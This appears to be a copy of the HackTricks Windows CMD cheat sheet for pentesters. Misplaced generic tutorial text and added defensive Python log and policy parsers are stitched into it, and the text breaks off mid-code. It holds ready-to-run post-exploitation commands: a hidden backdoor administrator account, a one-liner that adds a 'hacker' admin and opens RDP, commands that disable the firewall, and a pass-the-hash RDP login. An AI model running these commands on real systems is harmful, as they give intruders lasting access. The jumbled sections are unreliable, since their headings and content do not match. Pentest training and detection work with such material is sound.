hacktricks/windows-hardening/basic-cmd-for-pentesters.md
2024-02-10 17:52:19 +00:00


Basic Win CMD for Pentesters

System info

Version and Patches info

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info

wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates

hostname

DRIVERQUERY #3rd party driver vulnerable?

Environment

Introduction

The Windows command prompt, also known as CMD, is a powerful tool for pentesters. It allows you to interact with the operating system and execute various commands. In this section, we will cover some basic CMD commands that can be useful during a penetration test.

CMD Commands

1. dir

The dir command is used to list the files and directories in the current directory. It provides information such as the file name, size, and last modified date.

dir

2. cd

The cd command is used to change the current directory. You can specify the directory path as an argument to navigate to a specific directory.

cd C:\Windows\System32

3. echo

The echo command is used to display messages or enable/disable the echoing of commands in the command prompt.

echo Hello, world!

4. type

The type command is used to display the contents of a text file.

type C:\Users\user\Desktop\file.txt

5. copy

The copy command is used to copy files from one location to another.

copy C:\Users\user\Desktop\file.txt C:\Windows\System32

6. move

The move command is used to move files from one location to another.

move C:\Users\user\Desktop\file.txt C:\Windows\System32

7. del

The del command is used to delete files.

del C:\Windows\System32\file.txt

8. tasklist

The tasklist command is used to display a list of running processes.

tasklist

9. taskkill

The taskkill command is used to terminate a running process.

taskkill /PID 1234

10. netstat

The netstat command is used to display active network connections.

netstat -ano

11. ipconfig

The ipconfig command is used to display the IP configuration of the computer.

ipconfig

12. ping

The ping command is used to test the connectivity between two network devices.

ping 192.168.1.1

13. tracert

The tracert command is used to trace the route that packets take to reach a destination.

tracert www.example.com

14. net

The net command is used to manage network resources.

net user

15. whoami

The whoami command is used to display the current user.

whoami

Conclusion

These are just a few of the basic CMD commands that can be useful during a penetration test. Familiarizing yourself with these commands will help you navigate and interact with the Windows operating system more effectively.

set #List all environment variables

Some env variables to highlight:

  • COMPUTERNAME: Name of the computer
  • TEMP/TMP: Temp folder
  • USERNAME: Your username
  • HOMEPATH/USERPROFILE: Home directory
  • windir: C:\Windows
  • OS: Windows OS
  • LOGONSERVER: Name of domain controller
  • USERDNSDOMAIN: Domain name to use with DNS
  • USERDOMAIN: Name of the domain

nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC

Mounted disks

Disk Information

To view the mounted disks on a Windows system, you can use the wmic command. Open a command prompt and run the following command:

wmic logicaldisk get caption, description, volumename

This will display the caption (drive letter), description, and volume name for each mounted disk.

Disk Usage

To check the disk usage of a specific drive, you can use the dir command. Open a command prompt and run the following command, replacing C: with the drive letter you want to check:

dir C:

This will display the total size, free space, and used space of the specified drive.

Disk Management

To manage disks and partitions on a Windows system, you can use the diskpart command. Open a command prompt and run the following command:

diskpart

This will open the DiskPart command-line utility. From here, you can use various commands to manage disks, partitions, and volumes. Some commonly used commands include:

  • list disk: Lists all disks on the system.
  • select disk <disk_number>: Selects a specific disk for further operations.
  • list partition: Lists all partitions on the selected disk.
  • select partition <partition_number>: Selects a specific partition for further operations.
  • format fs=<filesystem> quick: Formats the selected partition with the specified file system (e.g., NTFS, FAT32).
  • assign letter=<drive_letter>: Assigns a drive letter to the selected partition.

Remember to be cautious when using the diskpart command, as it can have permanent effects on your system's disk configuration.

(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername

Defender

Recycle Bin

dir C:\$Recycle.Bin /s /b

Processes, Services & Software

Processes

Processes are running instances of programs on a computer. They can be system processes or user processes. System processes are essential for the operating system to function properly, while user processes are initiated by users or applications.

List Processes

To list all running processes on a Windows system, you can use the tasklist command.

tasklist

Kill a Process

To terminate a running process, you can use the taskkill command followed by the process ID (PID) or the process name.

taskkill /PID <PID>
taskkill /IM <process_name>

Services

Services are background processes that run continuously on a Windows system. They provide functionality to the operating system or other applications. Services can be started, stopped, or configured using the sc command.

List Services

To list all services on a Windows system, you can use the sc command with the query parameter.

sc query

Start/Stop a Service

To start or stop a service, you can use the sc command with the start or stop parameter followed by the service name.

sc start <service_name>
sc stop <service_name>

Software

Software refers to the programs and applications installed on a computer. It can include operating systems, productivity tools, utilities, and more.

List Installed Software

To list all installed software on a Windows system, you can use the wmic command with the product parameter.

wmic product get name,version

Uninstall Software

To uninstall software from a Windows system, you can use the wmic command with the product parameter and the call uninstall method followed by the product name.

wmic product where name="<product_name>" call uninstall

Summary (Processes, Services & Software)

Understanding processes, services, and software is essential for a pentester. Being able to list, terminate, start, stop, and uninstall them can help in identifying vulnerabilities and securing a system.

schtasks /query /fo LIST /v #Verbose output of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
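The grep pipeline above needs Unix tools; as an added example (not part of the HackTricks page), this Python parses the `schtasks /query /fo LIST /v` output natively and lists the tasks that run as SYSTEM, then flags those whose command lives outside the OS and Program Files directories, because the ACL of that directory decides who can change what SYSTEM executes. The sample output and the list of protected prefixes are constructed assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt of "schtasks /query /fo LIST /v" output (three tasks, keys trimmed).
SCHTASKS_SAMPLE = r"""
Folder: \
HostName:                             WS01
TaskName:                             \Backup Nightly
Status:                               Ready
Logon Mode:                           Background only
Task To Run:                          C:\Tools\backup.bat
Scheduled Task State:                 Enabled
Run As User:                          SYSTEM

HostName:                             WS01
TaskName:                             \User Sync
Status:                               Ready
Logon Mode:                           Interactive only
Task To Run:                          C:\Users\alice\sync.exe
Scheduled Task State:                 Enabled
Run As User:                          WS01\alice

Folder: \Microsoft\Windows\Defrag
HostName:                             WS01
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Status:                               Ready
Logon Mode:                           Background only
Task To Run:                          %windir%\system32\defrag.exe -c -h -k -g -$
Scheduled Task State:                 Disabled
Run As User:                          SYSTEM
"""

# Assumed list of locations where a SYSTEM task binary is expected to live;
# anything else deserves a directory/file ACL review.
PROTECTED_PREFIXES = ("c:\\windows\\", "%windir%\\", "%systemroot%\\",
                      "c:\\program files\\", "c:\\program files (x86)\\")


def parse_schtasks_list(text: str) -> List[Dict[str, str]]:
    """Parse LIST-format output: blank lines separate tasks, each line is 'Key:   value'."""
    tasks, current = [], {}
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            if "TaskName" in current:
                tasks.append(current)
            current = {}
            continue
        if ":" not in line:
            continue
        key, value = line.split(":", 1)   # keys never contain ':', values (paths) may
        current[key.strip()] = value.strip()
    if "TaskName" in current:
        tasks.append(current)
    return tasks


def runs_as(task: Dict[str, str], account: str) -> bool:
    """Compare the 'Run As User' field, ignoring a DOMAIN\\ or NT AUTHORITY\\ prefix."""
    user = task.get("Run As User", "").rsplit("\\", 1)[-1]
    return user.upper() == account.upper()


def tasks_running_as(tasks, account="SYSTEM", enabled_only=True) -> List[Tuple[str, str]]:
    """(TaskName, Task To Run) for every task that runs under `account`."""
    return [(t["TaskName"], t.get("Task To Run", ""))
            for t in tasks
            if runs_as(t, account)
            and (not enabled_only or t.get("Scheduled Task State", "").lower() == "enabled")]


def system_tasks_outside_protected_paths(tasks) -> List[Tuple[str, str]]:
    """SYSTEM tasks (enabled or not) whose command is outside OS/Program Files directories."""
    hits = []
    for name, command in tasks_running_as(tasks, "SYSTEM", enabled_only=False):
        path = command.strip('"').lower()
        if not path.startswith(PROTECTED_PREFIXES):
            hits.append((name, command))
    return hits
```

Feed it the real output with `schtasks /query /fo LIST /v > schtasks.txt` and `parse_schtasks_list(open("schtasks.txt").read())`.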

Domain info

Domain enumeration

Whois

To gather information about a domain, you can use the whois command. This command retrieves the registration details of a domain, including the owner's contact information, registration date, and expiration date.

whois example.com

DNS enumeration

To enumerate the DNS records of a domain, you can use the nslookup command. This command allows you to query the DNS server for various types of records, such as A, AAAA, MX, NS, and TXT records.

nslookup example.com

Zone transfer

Zone transfer is a technique used to obtain a complete copy of a DNS zone from a primary DNS server. This can be useful for gathering information about the domain's infrastructure and identifying potential vulnerabilities.

nslookup
> server <DNS server>
> ls -d example.com

Subdomain enumeration

Sublist3r

Sublist3r is a tool that allows you to enumerate subdomains of a domain using various search engines. It can be installed using the following command:

pip install sublist3r

To use Sublist3r, run the following command:

sublist3r -d example.com

Amass

Amass is another powerful tool for subdomain enumeration. It can be installed using the following command:

snap install amass

To use Amass, run the following command:

amass enum -d example.com

Subfinder

Subfinder is a tool that uses passive online sources to enumerate subdomains. It can be installed using the following command:

go get -u github.com/projectdiscovery/subfinder/cmd/subfinder

To use Subfinder, run the following command:

subfinder -d example.com

Email enumeration

TheHarvester

TheHarvester is a tool that allows you to gather email addresses associated with a domain. It can be installed using the following command:

pip install theharvester

To use TheHarvester, run the following command:

theharvester -d example.com -b all

Hunter.io

Hunter.io is a web-based tool that allows you to find email addresses associated with a domain. Simply visit the Hunter.io website and enter the domain name to search for email addresses.

Conclusion

Domain enumeration is an essential step in the reconnaissance phase of a penetration test. By gathering information about a domain, you can identify potential attack vectors and vulnerabilities that can be exploited.

# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list	#Displays information about the Domain and Domain Controllers

# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 user
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.

# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List users that belong to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domain controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name=\"domain admins\",domain=\"DOMAIN_NAME\"") #Members of the group

# Computers
dsquery computer #Get all computers
net view /domain #List of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers

# Trust relations
nltest /domain_trusts #Mapping of the trust relationships

# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

Logs & Events

Windows Event Logs

Windows Event Logs are a valuable source of information for pentesters. They contain records of various events that occur on a Windows system, such as system startup, user logins, application crashes, and security-related events. These logs can be accessed using the Event Viewer tool or through the command line.

Event Viewer

The Event Viewer is a graphical tool that allows you to view and analyze Windows Event Logs. To open the Event Viewer, you can use the following command:

eventvwr.msc

Once the Event Viewer is open, you can navigate through different log categories, such as Application, Security, and System, to view specific events. You can also filter events based on various criteria, such as event ID, source, or date and time.

Command Line

In addition to the Event Viewer, you can also access Windows Event Logs using the command line. The wevtutil command-line tool provides various options to query and manage event logs.

To list all available event logs, you can use the following command:

wevtutil el

To query events from a specific log, you can use the following command:

wevtutil qe <log_name>

Replace <log_name> with the name of the log you want to query, such as Application, Security, or System. You can also use additional parameters to filter the events based on specific criteria.

Event Log Files

Windows Event Logs are stored as binary files with the extension .evtx. These files are located in the %SystemRoot%\System32\winevt\Logs directory. Each log file corresponds to a specific log category, such as Application.evtx, Security.evtx, or System.evtx.

To access the log files directly, you can use the following command:

cd %SystemRoot%\System32\winevt\Logs

From there, you can copy the log files to a different location for further analysis.

Sysmon Logs

Sysmon is a powerful tool that provides detailed information about system activity. It can be used to monitor and detect malicious activity on a Windows system. Sysmon logs can be accessed using the Event Viewer or the command line.

Event Viewer

To view Sysmon logs using the Event Viewer, you can navigate to the Applications and Services Logs category and then select Microsoft, followed by Windows, and finally Sysmon.

Command Line

To access Sysmon logs using the command line, you can use the following command:

wevtutil qe Microsoft-Windows-Sysmon/Operational

This command will display the Sysmon logs in the command prompt.

Sysmon Log Files

Sysmon logs are stored as binary files with the extension .evtx. These files are located in the %SystemRoot%\System32\winevt\Logs directory, just like Windows Event Logs. The Sysmon log file is named Microsoft-Windows-Sysmon%4Operational.evtx.

To access the Sysmon log file directly, you can use the following command:

cd %SystemRoot%\System32\winevt\Logs

From there, you can copy the Sysmon log file to a different location for further analysis.

#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

Users & Groups

Users

List all users

net user

Get detailed information about a specific user

net user <username>

Create a new user

net user <username> <password> /add

Delete a user

net user <username> /delete

Change a user's password

net user <username> <new_password>

Disable a user account

net user <username> /active:no

Enable a user account

net user <username> /active:yes

Groups

List all groups

net localgroup

Get detailed information about a specific group

net localgroup <groupname>

Add a user to a group

net localgroup <groupname> <username> /add

Remove a user from a group

net localgroup <groupname> <username> /delete

Create a new group

net localgroup <groupname> /add

Delete a group

net localgroup <groupname> /delete

Add a group to another group

net localgroup <groupname> <othergroupname> /add

Remove a group from another group

net localgroup <groupname> <othergroupname> /delete

#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges

# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user

# Other users logged
qwinsta #Anyone else logged in?

#Launch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe

Groups

#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators

#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belong to the group

List sessions

net session

This command lists the active sessions on the target machine. It provides information such as the username, computer name, and session ID for each session.

qwinsta
klist sessions

Password policy

The password policy is a set of rules and requirements that dictate the characteristics of passwords used within a system. These policies are put in place to enhance the security of user accounts and prevent unauthorized access. Here are some common elements of a password policy:

  • Password Length: The minimum and maximum number of characters allowed in a password. Longer passwords are generally more secure.
  • Complexity: The use of a combination of uppercase and lowercase letters, numbers, and special characters to create a strong password.
  • Expiration: The frequency at which passwords must be changed. Regularly changing passwords reduces the risk of compromise.
  • History: The number of previous passwords that cannot be reused. This prevents users from cycling through a small set of passwords.
  • Lockout: The number of failed login attempts allowed before an account is locked. This protects against brute-force attacks.
  • Account Lockout Duration: The length of time an account remains locked after reaching the maximum number of failed login attempts.
  • Password Recovery: The process for recovering a forgotten password, often involving security questions or email verification.

By implementing a strong password policy, organizations can significantly improve the security of their systems and protect sensitive information from unauthorized access.

net accounts
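As an added example (not part of the HackTricks page), this Python parses the `net accounts` output and checks it against the policy elements listed above (length, history, expiration, lockout). Both output samples are constructed, and the BASELINE thresholds are an assumption to be replaced by your own standard.

```python
import re
from typing import Dict, List, Optional

# Constructed "net accounts" output from a standalone workstation with Windows defaults.
WEAK_SAMPLE = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              0
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""

# Constructed output after the policy has been tightened.
HARDENED_SAMPLE = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          90
Minimum password length:                              14
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           15
Lockout observation window (minutes):                 15
Computer role:                                        WORKSTATION
The command completed successfully.
"""

# Assumed baseline; each entry maps to one of the policy elements listed above.
BASELINE = {"min_length": 14, "history": 24, "max_age_days": 365, "lockout_threshold": 10}


def parse_net_accounts(text: str) -> Dict[str, str]:
    """Split each 'Setting name:   value' line; the first ':' followed by 2+ spaces ends the key."""
    policy = {}
    for line in text.splitlines():
        m = re.match(r"^(.+?):\s{2,}(.+?)\s*$", line)
        if m:
            policy[m.group(1).strip()] = m.group(2)
    return policy


def as_int(value: str) -> Optional[int]:
    """Numeric settings become ints; 'Never', 'Unlimited' and 'None' mean the control is off -> None."""
    return int(value) if value.isdigit() else None


def check_password_policy(policy: Dict[str, str], baseline=BASELINE) -> List[str]:
    """Return one finding per setting weaker than the baseline (empty list means compliant)."""
    findings = []
    length = as_int(policy.get("Minimum password length", ""))
    if length is None or length < baseline["min_length"]:
        findings.append(f"minimum length {length} < {baseline['min_length']}")
    history = as_int(policy.get("Length of password history maintained", ""))
    if history is None or history < baseline["history"]:
        findings.append(f"password history {history} < {baseline['history']} (reuse possible)")
    max_age = as_int(policy.get("Maximum password age (days)", ""))
    if max_age is None or max_age > baseline["max_age_days"]:
        findings.append(f"maximum age {'Unlimited' if max_age is None else max_age} days > {baseline['max_age_days']}")
    threshold = as_int(policy.get("Lockout threshold", ""))
    if threshold is None or threshold > baseline["lockout_threshold"]:
        findings.append("lockout threshold Never (online guessing is unlimited)" if threshold is None
                        else f"lockout threshold {threshold} > {baseline['lockout_threshold']}")
    return findings
```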

Credentials

Credentials are the keys to the kingdom when it comes to hacking. They are the usernames and passwords that grant access to various systems, applications, and services. As a hacker, obtaining and exploiting credentials is a crucial part of your job.

There are several techniques you can use to gather credentials:

  1. Phishing: This involves tricking users into revealing their credentials by posing as a legitimate entity, such as a bank or an email provider. Phishing attacks can be carried out through email, social media, or even phone calls.

  2. Brute-forcing: This technique involves systematically trying all possible combinations of usernames and passwords until the correct one is found. Brute-forcing can be time-consuming and resource-intensive, but it can be effective if the target has weak or easily guessable credentials.

  3. Password spraying: Instead of trying multiple passwords for a single user, password spraying involves trying a single password across multiple user accounts. This technique takes advantage of the fact that many users tend to reuse passwords across different accounts.

  4. Credential stuffing: This technique involves using a list of known usernames and passwords obtained from previous data breaches to gain unauthorized access to other accounts. Many users have a tendency to reuse passwords, making credential stuffing a viable attack vector.

  5. Keylogging: Keyloggers are malicious software or hardware devices that record every keystroke made on a compromised system. By capturing keystrokes, hackers can obtain usernames and passwords as users type them.

  6. Man-in-the-middle (MITM) attacks: In a MITM attack, the hacker intercepts the communication between two parties and captures any credentials exchanged during the process. This can be done by exploiting vulnerabilities in the network or by using tools like ARP spoofing.

Remember, obtaining credentials is just the first step. Once you have them, you can use them to gain unauthorized access to systems, escalate privileges, and carry out further attacks. However, it's important to note that hacking into systems without proper authorization is illegal and unethical. Always ensure you have the necessary permissions and legal rights before attempting any hacking activities.

cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access

Persistence with users

Introduction

In order to maintain persistence on a compromised system, it is important to establish a backdoor that allows access even after the initial compromise has been remediated. One common method of achieving this is by creating a new user account with administrative privileges. This user account can then be used to regain access to the system at a later time.

Creating a New User Account

To create a new user account on a Windows system, you can use the net user command. This command allows you to add, modify, or delete user accounts. To create a new user account with administrative privileges, follow these steps:

  1. Open a command prompt with administrative privileges.
  2. Use the following command to create a new user account:
net user <username> <password> /add

Replace <username> with the desired username for the new account and <password> with the desired password.

  3. Use the following command to add the new user account to the local administrators group:
net localgroup administrators <username> /add

Replace <username> with the username of the new account.

Hiding the User Account

To maintain stealth and avoid detection, it is recommended to hide the newly created user account from the Windows login screen. This can be achieved by modifying the Windows registry. Follow these steps to hide the user account:

  1. Open the Windows registry editor by running the regedit command.
  2. Navigate to the following registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
  3. Create a new DWORD value with the same name as the username of the user account you want to hide.
  4. Set the value of the DWORD to 0 to hide the user account.

Conclusion

By creating a new user account with administrative privileges and hiding it from the Windows login screen, you can establish persistence on a compromised system. This allows you to regain access even after the initial compromise has been remediated. However, it is important to note that these techniques should only be used for ethical purposes, such as penetration testing or authorized system administration.

# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to interesting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
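The account commands above leave a clear trail in the Security log: 4720 (user created), 4732 (member added to a local group) and 4728 (member added to a global group). As an added detection example (not part of the HackTricks page), this Python parses the text output of the `wevtutil qe Security /f:text` command from the Logs & Events section, extracts those events and chains a creation to a later add into an Admin group via the account SID. The log excerpt is constructed and trimmed to the fields the parser needs.

```python
import re

# Security-log event IDs written when the "net user ... /add" and
# "net localgroup/group ... /add" commands above succeed (Windows built-in IDs).
ACCOUNT_PERSISTENCE_IDS = {
    4720: "user account created",
    4728: "member added to security-enabled global group",
    4732: "member added to security-enabled local group",
}

# Constructed excerpt of "wevtutil qe Security /rd:true /f:text" (newest first).
SECURITY_SAMPLE = """\
Event[0]:
  Date: 2024-02-10T17:55:02.000Z
  Event ID: 4732
  Computer: WS01.corp.local
  Description:
A member was added to a security-enabled local group.

Subject:
\tAccount Name:\t\tadmin

Member:
\tSecurity ID:\t\tS-1-5-21-1111-2222-3333-1005
\tAccount Name:\t\t-

Group:
\tSecurity ID:\t\tS-1-5-32-544
\tGroup Name:\t\tAdministrators

Event[1]:
  Date: 2024-02-10T17:54:40.000Z
  Event ID: 4720
  Computer: WS01.corp.local
  Description:
A user account was created.

Subject:
\tAccount Name:\t\tadmin

New Account:
\tSecurity ID:\t\tS-1-5-21-1111-2222-3333-1005
\tAccount Name:\t\tbackupsvc
"""


def parse_wevtutil_text(text):
    """One dict per Event[N]: the indented header fields plus the raw Description."""
    events = []
    for chunk in re.split(r"^Event\[\d+\]:\s*$", text, flags=re.MULTILINE):
        if not chunk.strip():
            continue
        header, _, description = chunk.partition("Description:")
        fields = {}
        for line in header.splitlines():
            if ":" in line:
                key, value = line.split(":", 1)
                fields[key.strip()] = value.strip()
        fields["Description"] = description.strip()
        events.append(fields)
    return events


def parse_description(description):
    """Turn the Subject:/New Account:/Member:/Group: blocks into nested dicts."""
    sections, current = {}, None
    for line in description.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace() and line.rstrip().endswith(":"):
            current = line.strip()[:-1]
            sections[current] = {}
        elif current is not None and ":" in line:
            key, value = line.split(":", 1)
            sections[current][key.strip()] = value.strip()
    return sections


def account_persistence_alerts(events):
    """Keep only account-management events, normalised to actor, target SID/name and group."""
    alerts = []
    for ev in events:
        eid = ev.get("Event ID", "")
        if not eid.isdigit() or int(eid) not in ACCOUNT_PERSISTENCE_IDS:
            continue
        eid = int(eid)
        s = parse_description(ev["Description"])
        target = s.get("New Account" if eid == 4720 else "Member", {})
        alerts.append({
            "event_id": eid, "what": ACCOUNT_PERSISTENCE_IDS[eid],
            "time": ev.get("Date"), "computer": ev.get("Computer"),
            "actor": s.get("Subject", {}).get("Account Name"),
            "target_sid": target.get("Security ID"), "target": target.get("Account Name"),
            "group": s.get("Group", {}).get("Group Name"),
        })
    return alerts


def created_then_added_to_admins(alerts):
    """Chain a 4720 creation to a 4728/4732 add into an *Admin* group by SID."""
    created = {a["target_sid"]: a for a in alerts if a["event_id"] == 4720}
    chains = []
    for a in alerts:
        if a["event_id"] in (4728, 4732) and a["group"] and "admin" in a["group"].lower():
            c = created.get(a["target_sid"])
            if c:
                chains.append((c["target"], a["group"], a["actor"], c["time"], a["time"]))
    return chains
```

4732 records the new member as a SID with Account Name "-", which is why the chain is keyed on the SID rather than the name.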

Network

Interfaces, Routes, Ports, Hosts and DNSCache

Interfaces

To view the network interfaces on a Windows system, you can use the ipconfig command. This will display information such as the IP address, subnet mask, and default gateway for each interface.

ipconfig

Routes

To view the routing table on a Windows system, you can use the route print command. This will display information about the network routes, including the destination network, subnet mask, gateway, and interface.

route print

Ports

To view the open ports on a Windows system, you can use the netstat command. This will display a list of active connections and listening ports, along with the associated process ID (PID) and state.

netstat -ano

Hosts

To view the hosts file on a Windows system, you can use the type command. This will display the contents of the file, which maps hostnames to IP addresses.

type C:\Windows\System32\drivers\etc\hosts

DNSCache

To view the DNS cache on a Windows system, you can use the ipconfig /displaydns command. This will display a list of the recently resolved DNS entries, including the hostname, IP address, and time-to-live (TTL) value.

ipconfig /displaydns
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

Firewall

Firewalls are an essential component of network security. They act as a barrier between a trusted internal network and an untrusted external network, filtering incoming and outgoing network traffic based on predefined rules. Firewalls can be implemented in both hardware and software forms.

Types of Firewalls

  1. Packet Filtering Firewalls: These firewalls examine each packet of data that passes through them and compare it against a set of rules. If a packet matches a rule, it is either allowed or denied based on the rule's criteria. This type of firewall operates at the network layer (Layer 3) of the OSI model.

  2. Stateful Firewalls: Stateful firewalls not only examine individual packets but also keep track of the state of network connections. They maintain a record of the packets that have already passed through the firewall and use this information to make more informed decisions about subsequent packets. Stateful firewalls operate at the network layer (Layer 3) and transport layer (Layer 4) of the OSI model.

  3. Application Firewalls: These firewalls operate at the application layer (Layer 7) of the OSI model and are specifically designed to protect specific applications or services. They can inspect the content of packets and make decisions based on the application-level protocols being used.

Firewall Configuration

To effectively configure a firewall, you need to consider the following:

  • Default Deny Policy: By default, a firewall should deny all incoming and outgoing traffic unless explicitly allowed by rules.

  • Rule Prioritization: Firewall rules are evaluated in a sequential manner. It is important to prioritize rules based on their importance and potential impact.

  • Rule Logging: Enabling logging for firewall rules can help in monitoring and troubleshooting network traffic.

  • Regular Updates: Keep the firewall software and firmware up to date to ensure protection against the latest threats.

  • Testing and Monitoring: Regularly test and monitor the firewall to ensure that it is functioning as intended and providing the desired level of security.

Firewall Evasion Techniques

Firewalls can be bypassed using various techniques, including:

  • Tunneling: Encapsulating network traffic within another protocol to bypass firewall restrictions.

  • Fragmentation: Splitting packets into smaller fragments to evade packet filtering firewalls.

  • Protocol-level Attacks: Exploiting vulnerabilities in network protocols to bypass firewall rules.

  • Covert Channels: Establishing hidden communication channels that bypass firewall inspection.

  • Application-level Attacks: Exploiting vulnerabilities in applications to bypass application firewalls.

Understanding firewalls and their potential weaknesses is crucial for both defenders and attackers in the field of cybersecurity.

netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off  #Turn Off
NetSh Advfirewall set allprofiles state on  #Turn On
netsh firewall set opmode disable #Turn Off

#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

#Enable Remote assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

#Ninja combo (New Admin User, RDP + Remote Assistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
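The firewall commands above either switch profiles off or add inbound allow rules for RDP, so the defender-side check is to audit exactly those two things. This is an added example, not code from the HackTricks page: it parses constructed, abridged output of `netsh advfirewall show allprofiles` and `netsh advfirewall firewall show rule name=all` (the real output has more fields in the same "Name:   value" layout) and reports profiles whose state is OFF and enabled inbound Allow rules that expose a watched port to any remote address. The rule names, port list and helper names are this example's own.

```python
import re

# Constructed sample output of `netsh advfirewall show allprofiles` (abridged)
SAMPLE_PROFILES = """
Domain Profile Settings:
----------------------------------------------------------------------
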